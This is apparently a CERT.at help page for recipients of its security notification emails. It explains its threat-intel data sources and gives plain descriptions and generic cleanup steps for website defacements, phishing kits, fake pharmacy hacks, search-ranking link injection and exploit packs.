Emails From Us

If you got an e-mail from us informing you about problems in your IT infrastructure, you can find all relevant information here

  • For ISPs
  • For everyone else

For ISPs

CERT.at receives threat intelligence for Austrian IP networks from a variety of sources. "Austrian" means all .at domains as well as servers which are located in Austria according to Geo-IP data. As we receive data in different formats we harmonize and deduplicate it before forwarding it. The format we use in the CSV files attached to our e-mails is described here.

Shadowserver

The NGO Shadowserver (https://www.shadowserver.org) is our biggest threat intel source. You can check if the data in our e-mail(s) is from Shadowserver you can check the "feed" column in the CSV file. More detailed information about our feeds can be found here.

For everyone else

You received an e-mail from us and don't know how to proceed or just want more information about the problem? You can find it here as well as possible solutions.

Defacements

In a defacement (also called "web-graffiti") attackers change the appearence of your website. Often only the main page or a certain subpage are affected. In many cases the defaced site just displays the text "Hacked by" followed by the name of the culprit, acknowledgements to their friends and a comment about the site's lack of security. Sometimes they also add a new background image or even embed audio or video files.

While these kinds of attacks are usually not dangerous to visitors, they may cause reputational damage to the defaced site.

If your website was defaced CERT.at recommends the following steps:

  1. Identify and remediate the original attack vector. Updating the affected software and especially all plugins and themes is often enough.
  2. Check the webserver for backdoors which the attackers may have left behind to retain access.
  3. Clean up the actual defacement and restore the original state of the website.

If you are not sure how to execute these steps CERT.at recommends to contact your IT service provider.

Phishing

Phishing is an attack which aims at stealing credentials for online services like banks or streaming platforms. To make it harder to find the perpetrators behind phishing sites, these criminals often break into legitimate websites and install their phishing-kit there. When they are done, the stolen credentials are used to get access to the accounts of the target service.

If your website is hosting a phishing site CERT.at recommends the following steps:

  1. Identify and remediate the original attack vector. Updating the affected software and especially all plugins and themes is often enough.
  2. Check the webserver for backdoors which the attackers may have left behind to retain access.
  3. Clean up the phishing kit and restore the original state of the website.

If you are not sure how to execute these steps CERT.at recommends to contact your IT service provider.

Fake Pharmacy Hack

For a fake pharmacy hack attackers break into a website and place certain keywords into HTML files which are indexed by search engines like Google or DuckDuckGo but remain invisible for visitors.

Commonly the keywords are "cialis", "viagra", etc., i.e. alleged potency-enhancing drugs which make the affected site look like a pharmacy shop to search engines. After the search engines have been "convinced", criminals can make them forward requests for the affected website to (fake) shops the criminals control. From this point onwards, all visitors who find the website in question on a search engine, they will be forwarded to the fake shop instead of the real website when clicking on it. However, users who access the website directly via entering the URL in their browser (or using a bookmark) won't be affected.

If your website is the victim of a fake pharmacy hack CERT.at recommends the following:

  1. Identify and remediate the original attack vector. Updating the affected software and especially all plugins and themes is often enough.
  2. Check the webserver for backdoors which the attackers may have left behind to retain access.
  3. Remove the keywords from all HTML files and restore the original state of the website.

If you are not sure how to execute these steps CERT.at recommends to contact your IT service provider.

Search Engine Ranking Hack

One of the metrics search engines use to determine the "importance" of websites is the number of other websites linking to them; the more the more important it is. With a search engine ranking hack criminals try to exploit this behaviour by breaking into other websites and placing a lot of links to their own websites. These links are usually hidden to make them invisible to the casual observer.

If your website has fallen victim to a search engine ranking hack CERT.at recommends the following actions:

  1. Identify and remediate the original attack vector. Updating the affected software and especially all plugins and themes is often enough.
  2. Check the webserver for backdoors which the attackers may have left behind to retain access.
  3. Remove the links from all HTML files and restore the original state of the website.

If you are not sure how to execute these steps CERT.at recommends to contact your IT service provider.

Exploit Packs

CERT.at labels any kind of malware which is pushed to and executed on a user's PC when they visit a website as "exploit pack".

If an exploit pack is found on your website this indicates that criminals have gained access to it and abuse it to spread malware.

CERT.at recommends the following steps for mitigation:

  1. Identify and remediate the original attack vector. Updating the affected software and especially all plugins and themes is often enough.
  2. Check the webserver for backdoors which the attackers may have left behind to retain access.
  3. Remove the links from all HTML files and restore the original state of the website.

If you are not sure how to execute these steps CERT.at recommends to contact your IT service provider.